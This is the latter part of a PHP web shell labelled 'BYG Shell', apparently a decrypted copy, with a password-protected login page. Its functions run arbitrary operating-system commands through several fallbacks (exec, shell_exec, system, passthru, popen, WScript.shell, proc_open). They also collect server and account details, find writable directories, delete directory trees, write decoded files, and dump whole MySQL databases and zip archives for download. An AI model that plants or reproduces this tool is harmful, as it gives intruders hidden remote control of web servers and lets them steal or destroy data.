1497. makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
1498. p('<p>');
1499. makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
1500. makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1501. p('</p>');
1502. formfoot();
1503. }
1504. formhead(array('title'=>'Execute Command'));
1505. makehide('action','shell');
1506. if (IS_WIN && IS_COM) {
1507. $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
1508. makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
1509. }
1510. p('<p>');
1511. makeinput(array('title'=>'Command','name'=>'command','value'=>$command));
1512. makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1513. p('</p>');
1514. formfoot();
1515.  
1516. if ($command) {
1517. p('<hr width="100%" noshade /><pre>');
1518. if ($execfunc=='wscript' && IS_WIN && IS_COM) {
1519. $wsh = new COM('WScript.shell');
1520. $exec = $wsh->exec('cmd.exe /c '.$command);
1521. $stdout = $exec->StdOut();
1522. $stroutput = $stdout->ReadAll();
1523. echo $stroutput;
1524. } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
1525. $descriptorspec = array(
1526. 0 => array('pipe', 'r'),
1527. 1 => array('pipe', 'w'),
1528. 2 => array('pipe', 'w')
1529. );
1530. $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
1531. if (is_resource($process)) {
1532. fwrite($pipes[0], $command."\r\n");
1533. fwrite($pipes[0], "exit\r\n");
1534. fclose($pipes[0]);
1535. while (!feof($pipes[1])) {
1536. echo fgets($pipes[1], 1024);
1537. }
1538. fclose($pipes[1]);
1539. while (!feof($pipes[2])) {
1540. echo fgets($pipes[2], 1024);
1541. }
1542. fclose($pipes[2]);
1543. proc_close($process);
1544. }
1545. } else {
1546. echo(execute($command));
1547. }
1548. p('</pre>');
1549. }
1550. }//end shell
1551.  
1552. elseif ($action == 'phpenv') {
1553. $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
1554. $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
1555. !$dis_func && $dis_func = 'No';
1556. $info = array(
1557. 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
1558. 2 => array('Server Domain',$_SERVER['SERVER_NAME']),
1559. 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
1560. 4 => array('Server OS',PHP_OS),
1561. 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
1562. 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
1563. 7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
1564. 8 => array('PHP run mode',strtoupper(php_sapi_name())),
1565. 9 => array('The file path',__FILE__),
1566.  
1567. 10 => array('PHP Version',PHP_VERSION),
1568. 11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')),
1569. 12 => array('Safe Mode',getcfg('safe_mode')),
1570. 13 => array('Administrator',$adminmail),
1571. 14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
1572. 15 => array('enable_dl',getcfg('enable_dl')),
1573. 16 => array('display_errors',getcfg('display_errors')),
1574. 17 => array('register_globals',getcfg('register_globals')),
1575. 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
1576. 19 => array('memory_limit',getcfg('memory_limit')),
1577. 20 => array('post_max_size',getcfg('post_max_size')),
1578. 21 => array('upload_max_filesize',$upsize),
1579. 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
1580. 23 => array('disable_functions',$dis_func),
1581. );
1582.  
1583. if($phpvarname) {
1584. m($phpvarname .' : '.getcfg($phpvarname));
1585. }
1586.  
1587. formhead(array('title'=>'Server environment'));
1588. makehide('action','phpenv');
1589. makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
1590. formfooter();
1591.  
1592. $hp = array(0=> 'Server', 1=> 'PHP');
1593. for($a=0;$a<2;$a++) {
1594. p('<h2>'.$hp[$a].' &raquo;</h2>');
1595. p('<ul class="info">');
1596. if ($a==0) {
1597. for($i=1;$i<=9;$i++) {
1598. p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1599. }
1600. } elseif ($a == 1) {
1601. for($i=10;$i<=23;$i++) {
1602. p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1603. }
1604. }
1605. p('</ul>');
1606. }
1607. }//end phpenv
1608.  
1609. else {
1610. m('Undefined Action');
1611. }
1612.  
1613. ?>
1614. </td></tr></table>
1615. <div style="padding:10px;border-bottom:1px solid #0E0E0E;border-top:1px solid #0E0E0E;background:#0E0E0E;">
1616. <span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
1617. Copyright (C) 2004-2018 <B></B> - Develop by <a href=http://google.com target=_blank><B>BYG </B></a> - <B>- BYG Shell - Decrypted and Remove Email </B>
1618. </div>
1619. </body>
1620. </html>
1621.  
1622. <?php
1623.  
1624. /*======================================================
1625. Show info shell
1626. ======================================================*/
1627.  
1628. function m($msg) {
1629. echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
1630. echo $msg;
1631. echo '</div>';
1632. }
1633. function scookie($key, $value, $life = 0, $prefix = 1) {
1634. global $admin, $timestamp, $_SERVER;
1635. $key = ($prefix ? $admin['cookiepre'] : '').$key;
1636. $life = $life ? $life : $admin['cookielife'];
1637. $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
1638. setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
1639. }
1640. function multi($num, $perpage, $curpage, $tablename) {
1641. $multipage = '';
1642. if($num > $perpage) {
1643. $page = 10;
1644. $offset = 5;
1645. $pages = @ceil($num / $perpage);
1646. if($page > $pages) {
1647. $from = 1;
1648. $to = $pages;
1649. } else {
1650. $from = $curpage - $offset;
1651. $to = $curpage + $page - $offset - 1;
1652. if($from < 1) {
1653. $to = $curpage + 1 - $from;
1654. $from = 1;
1655. if(($to - $from) < $page && ($to - $from) < $pages) {
1656. $to = $page;
1657. }
1658. } elseif($to > $pages) {
1659. $from = $curpage - $pages + $to;
1660. $to = $pages;
1661. if(($to - $from) < $page && ($to - $from) < $pages) {
1662. $from = $pages - $page + 1;
1663. }
1664. }
1665. }
1666. $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
1667. for($i = $from; $i <= $to; $i++) {
1668. $multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
1669. }
1670. $multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
1671. $multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
1672. }
1673. return $multipage;
1674. }
1675. // Login page
1676. function loginpage() {
1677. ?>
1678. <html>
1679. <head>
1680.  
1681. <body bgcolor=black background=1.jpg>
1682.  
1683. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
1684. <title>BYG - The Legend of Vietnamese Hacker World </title>
1685. <style type="text/css">
1686. A:link {text-decoration: none; color: green }
1687. A:visited {text-decoration: none;color:red}
1688. A:active {text-decoration: none}
1689. A:hover {text-decoration: underline; color: green;}
1690. input, textarea, button
1691. {
1692. font-size: 11pt;
1693. color: #FFFFFF;
1694. font-family: verdana, sans-serif;
1695. background-color: #000000;
1696. border-left: 2px dashed #8B0000;
1697. border-top: 2px dashed #8B0000;
1698. border-right: 2px dashed #8B0000;
1699. border-bottom: 2px dashed #8B0000;
1700. }
1701.  
1702. </style>
1703.  
1704. <BR><BR>
1705. <div align=center >
1706.  
1707. <div>
1708. <font color=gray>
1709. <br /><br /><br /><br /><br />
1710.  
1711. <form method="POST" action="">
1712. <span style="font:20pt tahoma;"> </span><input name="password" type="password" size="30">
1713. <input type="hidden" name="doing" value="login">
1714. <input type="submit" value="Login">
1715. </form>
1716. <BR>
1717. <?php
1718. echo "".$err_mess."";
1719. ?>
1720.  
1721. <B><font color=red>
1722.  
1723.  
1724.  
1725.  
1726.  
1727.  
1728. </div>
1729.  
1730.  
1731. </fieldset>
1732.  
1733.  
1734.  
1735. </head>
1736. </html>
1737.  
1738.  
1739. <?php
1740. exit;
1741.  
1742. }//end loginpage()
1743.  
1744. function execute($cfe) {
1745. $res = '';
1746. if ($cfe) {
1747. if(function_exists('exec')) {
1748. @exec($cfe,$res);
1749. $res = join("\n",$res);
1750. } elseif(function_exists('shell_exec')) {
1751. $res = @shell_exec($cfe);
1752. } elseif(function_exists('system')) {
1753. @ob_start();
1754. @system($cfe);
1755. $res = @ob_get_contents();
1756. @ob_end_clean();
1757. } elseif(function_exists('passthru')) {
1758. @ob_start();
1759. @passthru($cfe);
1760. $res = @ob_get_contents();
1761. @ob_end_clean();
1762. } elseif(@is_resource($f = @popen($cfe,"r"))) {
1763. $res = '';
1764. while(!@feof($f)) {
1765. $res .= @fread($f,1024);
1766. }
1767. @pclose($f);
1768. }
1769. }
1770. return $res;
1771. }
1772. function which($pr) {
1773. $path = execute("which $pr");
1774. return ($path ? $path : $pr);
1775. }
1776.  
1777. function cf($fname,$text){
1778. if($fp=@fopen($fname,'w')) {
1779. @fputs($fp,@base64_decode($text));
1780. @fclose($fp);
1781. }
1782. }
1783.  
1784. // Debug
1785. function debuginfo() {
1786. global $starttime;
1787. $mtime = explode(' ', microtime());
1788. $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
1789. echo 'Processed in '.$totaltime.' second(s)';
1790. }
1791.  
1792. // Function connect database
1793. function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
1794. if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
1795. p('<h2>Can not connect to MySQL server</h2>');
1796. exit;
1797. }
1798. if($link && $dbname) {
1799. if (!@mysql_select_db($dbname, $link)) {
1800. p('<h2>Database selected has error</h2>');
1801. exit;
1802. }
1803. }
1804. if($link && mysql_get_server_info() > '4.1') {
1805. if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
1806. q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
1807. }
1808. }
1809. return $link;
1810. }
1811.  
1812. // Array strip
1813. function s_array(&$array) {
1814. if (is_array($array)) {
1815. foreach ($array as $k => $v) {
1816. $array[$k] = s_array($v);
1817. }
1818. } else if (is_string($array)) {
1819. $array = stripslashes($array);
1820. }
1821. return $array;
1822. }
1823.  
1824. // HTML Strip
1825. function html_clean($content) {
1826. $content = htmlspecialchars($content);
1827. $content = str_replace("\n", "<br />", $content);
1828. $content = str_replace(" ", "&nbsp;&nbsp;", $content);
1829. $content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
1830. return $content;
1831. }
1832.  
1833. // Chmod
1834. function getChmod($filepath){
1835. return substr(base_convert(@fileperms($filepath),10,8),-4);
1836. }
1837.  
1838. function getPerms($filepath) {
1839. $mode = @fileperms($filepath);
1840. if (($mode & 0xC000) === 0xC000) {$type = 's';}
1841. elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
1842. elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
1843. elseif (($mode & 0x8000) === 0x8000) {$type = '-';}
1844. elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
1845. elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
1846. elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
1847. else {$type = '?';}
1848.  
1849. $owner['read'] = ($mode & 00400) ? 'r' : '-';
1850. $owner['write'] = ($mode & 00200) ? 'w' : '-';
1851. $owner['execute'] = ($mode & 00100) ? 'x' : '-';
1852. $group['read'] = ($mode & 00040) ? 'r' : '-';
1853. $group['write'] = ($mode & 00020) ? 'w' : '-';
1854. $group['execute'] = ($mode & 00010) ? 'x' : '-';
1855. $world['read'] = ($mode & 00004) ? 'r' : '-';
1856. $world['write'] = ($mode & 00002) ? 'w' : '-';
1857. $world['execute'] = ($mode & 00001) ? 'x' : '-';
1858.  
1859. if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
1860. if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
1861. if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
1862.  
1863. return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
1864. }
1865.  
1866. function getUser($filepath) {
1867. if (function_exists('posix_getpwuid')) {
1868. $array = @posix_getpwuid(@fileowner($filepath));
1869. if ($array && is_array($array)) {
1870. return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
1871. }
1872. }
1873. return '';
1874. }
1875.  
1876. // Delete dir
1877. function deltree($deldir) {
1878. $mydir=@dir($deldir);
1879. while($file=$mydir->read()) {
1880. if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) {
1881. @chmod($deldir.'/'.$file,0777);
1882. deltree($deldir.'/'.$file);
1883. }
1884. if (is_file($deldir.'/'.$file)) {
1885. @chmod($deldir.'/'.$file,0777);
1886. @unlink($deldir.'/'.$file);
1887. }
1888. }
1889. $mydir->close();
1890. @chmod($deldir,0777);
1891. return @rmdir($deldir) ? 1 : 0;
1892. }
1893.  
1894. // Background
1895. function bg() {
1896. global $bgc;
1897. return ($bgc++%2==0) ? 'alt1' : 'alt2';
1898. }
1899.  
1900. // Get path
1901. function getPath($scriptpath, $nowpath) {
1902. if ($nowpath == '.') {
1903. $nowpath = $scriptpath;
1904. }
1905. $nowpath = str_replace('\\', '/', $nowpath);
1906. $nowpath = str_replace('//', '/', $nowpath);
1907. if (substr($nowpath, -1) != '/') {
1908. $nowpath = $nowpath.'/';
1909. }
1910. return $nowpath;
1911. }
1912.  
1913. // Get up path
1914. function getUpPath($nowpath) {
1915. $pathdb = explode('/', $nowpath);
1916. $num = count($pathdb);
1917. if ($num > 2) {
1918. unset($pathdb[$num-1],$pathdb[$num-2]);
1919. }
1920. $uppath = implode('/', $pathdb).'/';
1921. $uppath = str_replace('//', '/', $uppath);
1922. return $uppath;
1923. }
1924.  
1925. // Config
1926. function getcfg($varname) {
1927. $result = get_cfg_var($varname);
1928. if ($result == 0) {
1929. return 'No';
1930. } elseif ($result == 1) {
1931. return 'Yes';
1932. } else {
1933. return $result;
1934. }
1935. }
1936.  
1937. // Function name
1938. function getfun($funName) {
1939. return (false !== function_exists($funName)) ? 'Yes' : 'No';
1940. }
1941.  
1942. function GetList($dir){
1943. global $dirdata,$j,$nowpath;
1944. !$j && $j=1;
1945. if ($dh = opendir($dir)) {
1946. while ($file = readdir($dh)) {
1947. $f=str_replace('//','/',$dir.'/'.$file);
1948. if($file!='.' && $file!='..' && is_dir($f)){
1949. if (is_writable($f)) {
1950. $dirdata[$j]['filename']=str_replace($nowpath,'',$f);
1951. $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
1952. $dirdata[$j]['dirchmod']=getChmod($f);
1953. $dirdata[$j]['dirperm']=getPerms($f);
1954. $dirdata[$j]['dirlink']=ue($dir);
1955. $dirdata[$j]['server_link']=$f;
1956. $dirdata[$j]['client_link']=ue($f);
1957. $j++;
1958. }
1959. GetList($f);
1960. }
1961. }
1962. closedir($dh);
1963. clearstatcache();
1964. return $dirdata;
1965. } else {
1966. return array();
1967. }
1968. }
1969.  
1970. function qy($sql) {
1971. //echo $sql.'<br>';
1972. $res = $error = '';
1973. if(!$res = @mysql_query($sql)) {
1974. return 0;
1975. } else if(is_resource($res)) {
1976. return 1;
1977. } else {
1978. return 2;
1979. }
1980. return 0;
1981. }
1982.  
1983. function q($sql) {
1984. return @mysql_query($sql);
1985. }
1986.  
1987. function fr($qy){
1988. mysql_free_result($qy);
1989. }
1990.  
1991. function sizecount($size) {
1992. if($size > 1073741824) {
1993. $size = round($size / 1073741824 * 100) / 100 . ' G';
1994. } elseif($size > 1048576) {
1995. $size = round($size / 1048576 * 100) / 100 . ' M';
1996. } elseif($size > 1024) {
1997. $size = round($size / 1024 * 100) / 100 . ' K';
1998. } else {
1999. $size = $size . ' B';
2000. }
2001. return $size;
2002. }
2003.  
2004. // Zip
2005. class PHPZip{
2006. var $out='';
2007. function PHPZip($dir) {
2008. if (@function_exists('gzcompress')) {
2009. $curdir = getcwd();
2010. if (is_array($dir)) $filelist = $dir;
2011. else{
2012. $filelist=$this -> GetFileList($dir);//File list
2013. foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
2014. }
2015. if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
2016. else chdir($curdir);
2017. if (count($filelist)>0){
2018. foreach($filelist as $filename){
2019. if (is_file($filename)){
2020. $fd = fopen ($filename, 'r');
2021. $content = @fread ($fd, filesize($filename));
2022. fclose ($fd);
2023. if (is_array($dir)) $filename = basename($filename);
2024. $this -> addFile($content, $filename);
2025. }
2026. }
2027. $this->out = $this -> file();
2028. chdir($curdir);
2029. }
2030. return 1;
2031. }
2032. else return 0;
2033. }
2034.  
2035. // Show file list
2036. function GetFileList($dir){
2037. static $a;
2038. if (is_dir($dir)) {
2039. if ($dh = opendir($dir)) {
2040. while ($file = readdir($dh)) {
2041. if($file!='.' && $file!='..'){
2042. $f=$dir .'/'. $file;
2043. if(is_dir($f)) $this->GetFileList($f);
2044. $a[]=$f;
2045. }
2046. }
2047. closedir($dh);
2048. }
2049. }
2050. return $a;
2051. }
2052.  
2053. var $datasec = array();
2054. var $ctrl_dir = array();
2055. var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
2056. var $old_offset = 0;
2057.  
2058. function unix2DosTime($unixtime = 0) {
2059. $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
2060. if ($timearray['year'] < 1980) {
2061. $timearray['year'] = 1980;
2062. $timearray['mon'] = 1;
2063. $timearray['mday'] = 1;
2064. $timearray['hours'] = 0;
2065. $timearray['minutes'] = 0;
2066. $timearray['seconds'] = 0;
2067. } // end if
2068. return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
2069. ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
2070. }
2071.  
2072. function addFile($data, $name, $time = 0) {
2073. $name = str_replace('\\', '/', $name);
2074.  
2075. $dtime = dechex($this->unix2DosTime($time));
2076. $hexdtime = '\x' . $dtime[6] . $dtime[7]
2077. . '\x' . $dtime[4] . $dtime[5]
2078. . '\x' . $dtime[2] . $dtime[3]
2079. . '\x' . $dtime[0] . $dtime[1];
2080. eval('$hexdtime = "' . $hexdtime . '";');
2081. $fr = "\x50\x4b\x03\x04";
2082. $fr .= "\x14\x00";
2083. $fr .= "\x00\x00";
2084. $fr .= "\x08\x00";
2085. $fr .= $hexdtime;
2086.  
2087. $unc_len = strlen($data);
2088. $crc = crc32($data);
2089. $zdata = gzcompress($data);
2090. $c_len = strlen($zdata);
2091. $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
2092. $fr .= pack('V', $crc);
2093. $fr .= pack('V', $c_len);
2094. $fr .= pack('V', $unc_len);
2095. $fr .= pack('v', strlen($name));
2096. $fr .= pack('v', 0);
2097. $fr .= $name;
2098. $fr .= $zdata;
2099. $fr .= pack('V', $crc);
2100. $fr .= pack('V', $c_len);
2101. $fr .= pack('V', $unc_len);
2102.  
2103. $this -> datasec[] = $fr;
2104. $new_offset = strlen(implode('', $this->datasec));
2105.  
2106. $cdrec = "\x50\x4b\x01\x02";
2107. $cdrec .= "\x00\x00";
2108. $cdrec .= "\x14\x00";
2109. $cdrec .= "\x00\x00";
2110. $cdrec .= "\x08\x00";
2111. $cdrec .= $hexdtime;
2112. $cdrec .= pack('V', $crc);
2113. $cdrec .= pack('V', $c_len);
2114. $cdrec .= pack('V', $unc_len);
2115. $cdrec .= pack('v', strlen($name) );
2116. $cdrec .= pack('v', 0 );
2117. $cdrec .= pack('v', 0 );
2118. $cdrec .= pack('v', 0 );
2119. $cdrec .= pack('v', 0 );
2120. $cdrec .= pack('V', 32 );
2121. $cdrec .= pack('V', $this -> old_offset );
2122. $this -> old_offset = $new_offset;
2123. $cdrec .= $name;
2124.  
2125. $this -> ctrl_dir[] = $cdrec;
2126. }
2127.  
2128. function file() {
2129. $data = implode('', $this -> datasec);
2130. $ctrldir = implode('', $this -> ctrl_dir);
2131. return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
2132. }
2133. }
2134.  
2135. // Dump mysql
2136. function sqldumptable($table, $fp=0) {
2137. $tabledump = "DROP TABLE IF EXISTS $table;\n";
2138. $tabledump .= "CREATE TABLE $table (\n";
2139.  
2140. $firstfield=1;
2141.  
2142. $fields = q("SHOW FIELDS FROM $table");
2143. while ($field = mysql_fetch_array($fields)) {
2144. if (!$firstfield) {
2145. $tabledump .= ",\n";
2146. } else {
2147. $firstfield=0;
2148. }
2149. $tabledump .= " $field[Field] $field[Type]";
2150. if (!empty($field["Default"])) {
2151. $tabledump .= " DEFAULT '$field[Default]'";
2152. }
2153. if ($field['Null'] != "YES") {
2154. $tabledump .= " NOT NULL";
2155. }
2156. if ($field['Extra'] != "") {
2157. $tabledump .= " $field[Extra]";
2158. }
2159. }
2160. fr($fields);
2161.  
2162. $keys = q("SHOW KEYS FROM $table");
2163. while ($key = mysql_fetch_array($keys)) {
2164. $kname=$key['Key_name'];
2165. if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
2166. $kname="UNIQUE|$kname";
2167. }
2168. if(!is_array($index[$kname])) {
2169. $index[$kname] = array();
2170. }
2171. $index[$kname][] = $key['Column_name'];
2172. }
2173. fr($keys);
2174.  
2175. while(list($kname, $columns) = @each($index)) {
2176. $tabledump .= ",\n";
2177. $colnames=implode($columns,",");
2178.  
2179. if ($kname == "PRIMARY") {
2180. $tabledump .= " PRIMARY KEY ($colnames)";
2181. } else {
2182. if (substr($kname,0,6) == "UNIQUE") {
2183. $kname=substr($kname,7);
2184. }
2185. $tabledump .= " KEY $kname ($colnames)";
2186. }
2187. }
2188.  
2189. $tabledump .= "\n);\n\n";
2190. if ($fp) {
2191. fwrite($fp,$tabledump);
2192. } else {
2193. echo $tabledump;
2194. }
2195.  
2196. $rows = q("SELECT * FROM $table");
2197. $numfields = mysql_num_fields($rows);
2198. while ($row = mysql_fetch_array($rows)) {
2199. $tabledump = "INSERT INTO $table VALUES(";
2200.  
2201. $fieldcounter=-1;
2202. $firstfield=1;
2203. while (++$fieldcounter<$numfields) {
2204. if (!$firstfield) {
2205. $tabledump.=", ";
2206. } else {
2207. $firstfield=0;
2208. }
2209.  
2210. if (!isset($row[$fieldcounter])) {
2211. $tabledump .= "NULL";
2212. } else {
2213. $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
2214. }
2215. }
2216.  
2217. $tabledump .= ");\n";
2218.  
2219. if ($fp) {
2220. fwrite($fp,$tabledump);
2221. } else {
2222. echo $tabledump;
2223. }
2224. }
2225. fr($rows);
2226. if ($fp) {
2227. fwrite($fp,"\n");
2228. } else {
2229. echo "\n";
2230. }
2231. }
2232.  
2233. function ue($str){
2234. return urlencode($str);
2235. }
2236.  
2237. function p($str){
2238. echo $str."\n";
2239. }
2240.  
2241. function tbhead() {
2242. p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
2243. }
2244. function tbfoot(){
2245. p('</table>');
2246. }
2247.  
2248. function makehide($name,$value=''){
2249. p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
2250. }
2251.  
2252. function makeinput($arg = array()){
2253. $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
2254. $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
2255. !$arg['type'] && $arg['type'] = 'text';
2256. $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
2257. $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
2258. if ($arg['newline']) {
2259. p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
2260. } else {
2261. p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
2262. }
2263. }
2264.  
2265. function makeselect($arg = array()){
2266. if ($arg['onchange']) {
2267. $onchange = 'onchange="'.$arg['onchange'].'"';
2268. }
2269. $arg['title'] = $arg['title'] ? $arg['title'] : '';
2270. if ($arg['newline']) p('<p>');
2271. p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
2272. if (is_array($arg['option'])) {
2273. foreach ($arg['option'] as $key=>$value) {
2274. if ($arg['selected']==$key) {
2275. p("<option value=\"$key\" selected>$value</option>");
2276. } else {
2277. p("<option value=\"$key\">$value</option>");
2278. }
2279. }
2280. }
2281. p("</select>");
2282. if ($arg['newline']) p('</p>');
2283. }
2284. function formhead($arg = array()) {
2285. !$arg['method'] && $arg['method'] = 'post';
2286. !$arg['action'] && $arg['action'] = $self;
2287. $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
2288. !$arg['name'] && $arg['name'] = 'form1';
2289. p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
2290. if ($arg['title']) {
2291. p('<h2>'.$arg['title'].' &raquo;</h2>');
2292. }
2293. }
2294.  
2295. function maketext($arg = array()){
2296. !$arg['cols'] && $arg['cols'] = 100;
2297. !$arg['rows'] && $arg['rows'] = 25;
2298. $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
2299. p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
2300. }
2301.  
2302. function formfooter($name = ''){
2303. !$name && $name = 'submit';
2304. p('<p><input class="bt" name="'.$name.'" id=\"'.$name.'\" type="submit" value="Submit"></p>');
2305. p('</form>');
2306. }
2307.  
2308. function formfoot(){
2309. p('</form>');
2310. }
2311.  
2312. // Exit
2313. function pr($a) {
2314. echo '<pre>';
2315. print_r($a);
2316. echo '</pre>';
2317. }
2318. ?>